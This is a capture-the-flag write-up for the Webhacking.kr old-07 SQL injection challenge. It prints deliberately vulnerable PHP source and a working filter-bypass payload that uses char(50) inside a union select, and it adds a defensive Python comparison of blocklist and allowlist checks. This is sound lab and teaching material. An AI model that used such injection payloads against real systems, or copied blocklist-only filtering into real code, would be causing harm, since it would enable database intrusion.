
[Webhacking.kr] old-07

chanchand 2023. 2. 27. 16:06

Problem


<?php
  include "../../config.php";
  if($_GET['view_source']) view_source();
?><html>
<head>
<title>Challenge 7</title>
</head>
<body>
<?php
$go=$_GET['val'];
if(!$go) { echo("<meta http-equiv=refresh content=0;url=index.php?val=1>"); }
echo("<html><head><title>admin page</title></head><body bgcolor='black'><font size=2 color=gray><b><h3>Admin page</h3></b><p>");
if(preg_match("/2|-|\+|from|_|=|\\s|\*|\//i",$go)) exit("Access Denied!");
$db = dbconnect();
$rand=rand(1,5);
if($rand==1){
  $result=mysqli_query($db,"select lv from chall7 where lv=($go)") or die("nice try!");
}
if($rand==2){
  $result=mysqli_query($db,"select lv from chall7 where lv=(($go))") or die("nice try!");
}
if($rand==3){
  $result=mysqli_query($db,"select lv from chall7 where lv=((($go)))") or die("nice try!");
}
if($rand==4){
  $result=mysqli_query($db,"select lv from chall7 where lv=(((($go))))") or die("nice try!");
}
if($rand==5){
  $result=mysqli_query($db,"select lv from chall7 where lv=((((($go)))))") or die("nice try!");
}
$data=mysqli_fetch_array($result);
if(!$data[0]) { echo("query error"); exit(); }
if($data[0]==1){
  echo("<input type=button style=border:0;bgcolor='gray' value='auth' onclick=\"alert('Access_Denied!')\"><p>");
}
elseif($data[0]==2){
  echo("<input type=button style=border:0;bgcolor='gray' value='auth' onclick=\"alert('Hello admin')\"><p>");
  solve(7);
}
?>
<a href=./?view_source=1>view-source</a>
</body>
</html>


Solution


The challenge is solved when the value returned by mysqli_query is 2.


The value of the val parameter is stored in the go variable, passes through the filter check, and is then placed directly into the SQL statement.

$go=$_GET['val'];
if(!$go) { echo("<meta http-equiv=refresh content=0;url=index.php?val=1>"); }
echo("<html><head><title>admin page</title></head><body bgcolor='black'><font size=2 color=gray><b><h3>Admin page</h3></b><p>");
if(preg_match("/2|-|\+|from|_|=|\\s|\*|\//i",$go)) exit("Access Denied!");
select lv from chall7 where lv=($go)


The SQL statement can be manipulated through the parameter; since the digit 2 is filtered, char(50) is used to produce it instead.

/?val=0)union(select(char(50))
select lv from chall7 where lv=(0)union(select(char(50)))


rand(1,5) picks one of the queries below to execute, each wrapping the input in a different number of parentheses.

$result=mysqli_query($db,"select lv from chall7 where lv=($go)") or die("nice try!");
$result=mysqli_query($db,"select lv from chall7 where lv=(($go))") or die("nice try!");
$result=mysqli_query($db,"select lv from chall7 where lv=((($go)))") or die("nice try!");
$result=mysqli_query($db,"select lv from chall7 where lv=(((($go))))") or die("nice try!");
$result=mysqli_query($db,"select lv from chall7 where lv=((((($go)))))") or die("nice try!");


Because the nesting depth is random, repeating the request several times solves the challenge.
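To show from the defender's side why this blocklist fails, here is an added Python example (not code from the original write-up) that mirrors the challenge's regex, rebuilds the query for each rand() depth, and contrasts the blocklist with an integer allowlist plus a bound parameter; the function names and sample inputs are my own.

```python
import re

# The challenge's blocklist as PHP compiles "/2|-|\+|from|_|=|\\s|\*|\//i":
# the digit 2, minus, plus, the word "from", underscore, equals, whitespace, asterisk, slash.
BLOCKLIST = re.compile(r"2|-|\+|from|_|=|\s|\*|/", re.IGNORECASE)

# Constructed input: the write-up's bypass, which contains none of the blocked tokens.
PAYLOAD = "0)union(select(char(50))"


def passes_blocklist(val: str) -> bool:
    """Mirror of the challenge filter: True means the value reaches mysqli_query untouched."""
    return BLOCKLIST.search(val) is None


def passes_allowlist(val: str) -> bool:
    """Hardened check: lv is compared as a number, so only a plain integer literal is accepted."""
    return re.fullmatch(r"[0-9]+", val) is not None


def build_query(val: str, depth: int) -> str:
    """Rebuild the query the challenge runs when rand(1,5) == depth (depth pairs of parentheses)."""
    return "select lv from chall7 where lv=" + "(" * depth + val + ")" * depth


def safe_query(val: str):
    """Defensive equivalent: validate first, then pass the value as a bound parameter
    (mysqli_prepare / bind_param on the PHP side) so it is never parsed as SQL."""
    if not passes_allowlist(val):
        raise ValueError("val must be an integer literal")
    return "select lv from chall7 where lv=?", (int(val),)


if __name__ == "__main__":
    for v in ("1", "2", "1 or 1", PAYLOAD):
        print(f"{v!r:28} blocklist={passes_blocklist(v)!s:5} allowlist={passes_allowlist(v)}")
    # At depth 1 the injected union lands at statement level; deeper nesting changes the parse,
    # which is why the write-up has to repeat the request until rand() cooperates.
    for depth in range(1, 6):
        print(build_query(PAYLOAD, depth))
```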
